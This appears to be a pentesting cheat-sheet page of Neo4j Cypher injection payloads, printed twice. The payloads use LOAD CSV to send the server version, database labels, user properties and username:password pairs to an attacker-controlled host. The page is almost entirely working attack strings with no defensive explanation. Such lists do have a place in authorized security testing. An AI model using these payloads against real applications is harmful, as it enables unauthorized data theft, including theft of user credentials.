Neo4j Injection

## ------------------| Get Server Version
' OR 1=1 WITH 1 as a  CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://<IP>/?v=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 // 

## ------------------| List All Tables
' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<IP>/?l='+label as l RETURN 0 as _0 
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<IP>/?l='+label as l RETURN 0 as _0 

## ------------------| Fetch Data
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://<IP>/?d=' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
a ' match (u:user) with distinct keys(u) as k  LOAD CSV FROM 'http://<IP>/?k=' + k[0] a as l RETURN 0 as _0 //
' match (u:user) with distinct u.username + ":" + u.password as a LOAD CSV FROM 'http://<IP>/?' + a as l RETURN 0 as _0 //

Last updated 9 months ago

Was this helpful?

Neo4j Injection

## ------------------| Get Server Version
' OR 1=1 WITH 1 as a  CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://<IP>/?v=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 // 

## ------------------| List All Tables
' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<IP>/?l='+label as l RETURN 0 as _0 
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://<IP>/?l='+label as l RETURN 0 as _0 

## ------------------| Fetch Data
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://<IP>/?d=' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
a ' match (u:user) with distinct keys(u) as k  LOAD CSV FROM 'http://<IP>/?k=' + k[0] a as l RETURN 0 as _0 //
' match (u:user) with distinct u.username + ":" + u.password as a LOAD CSV FROM 'http://<IP>/?' + a as l RETURN 0 as _0 //

Last updated 9 months ago

Was this helpful?